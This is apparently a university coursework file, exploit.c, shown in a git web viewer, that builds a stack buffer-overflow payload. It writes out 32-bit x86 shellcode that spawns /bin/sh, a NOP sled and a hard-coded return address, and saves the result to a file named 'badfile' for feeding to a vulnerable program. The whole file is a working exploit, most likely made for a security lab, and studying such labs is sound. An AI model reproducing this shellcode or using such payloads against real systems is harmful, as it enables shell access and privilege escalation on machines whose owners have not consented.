uni

University stuff
git clone git://git.margiolis.net/uni.git
Log | Files | Refs | README | LICENSE

exploit.c (861B)

      1 #include <stdio.h>
      2 #include <stdlib.h>
      3 #include <string.h>
      4 
      5 const char code[] =
      6 	"\x31\xc0"	/* xorl		%eax, %eax	*/
      7 	"\x50"		/* pushl	%eax		*/
      8 	"\x68""//sh"	/* pushl	$addr		*/
      9 	"\x68""/bin"	/* pushl	$addr		*/
     10 	"\x89\xe3"	/* movl		%esp, %ebx	*/
     11 	"\x50"		/* pushl	%eax		*/
     12 	"\x53"		/* pushl	%ebx		*/
     13 	"\x89\xe1"	/* movl		%esp, %ecx	*/
     14 	"\x99"		/* cdq				*/
     15 	"\xb0\x0b"	/* movb		$0x0b, %al	*/
     16 	"\xcd\x80"	/* int		$0x80		*/
     17 	;
     18 
     19 int
     20 main(int argc, char *argv[])
     21 {
     22 	char buf[517];
     23 	FILE *badfile;
     24 
     25 	/* fill with nops */
     26 	memset(&buf, 0x90, 517);
     27 
     28 	/* place return address */
     29 	*((long *)(buf + 0x24)) = 0xbfffeb48 + 0x60;
     30 
     31 	/* place the shellcode at the end of buf */
     32 	memcpy(buf + sizeof(buf) - sizeof(code), code, sizeof(code));
     33 
     34 	/* save the contents of badfile */
     35 	badfile = fopen("./badfile", "w");
     36 	fwrite(buf, 517, 1, badfile);
     37 	fclose(badfile);
     38 
     39 	return (0);
     40 }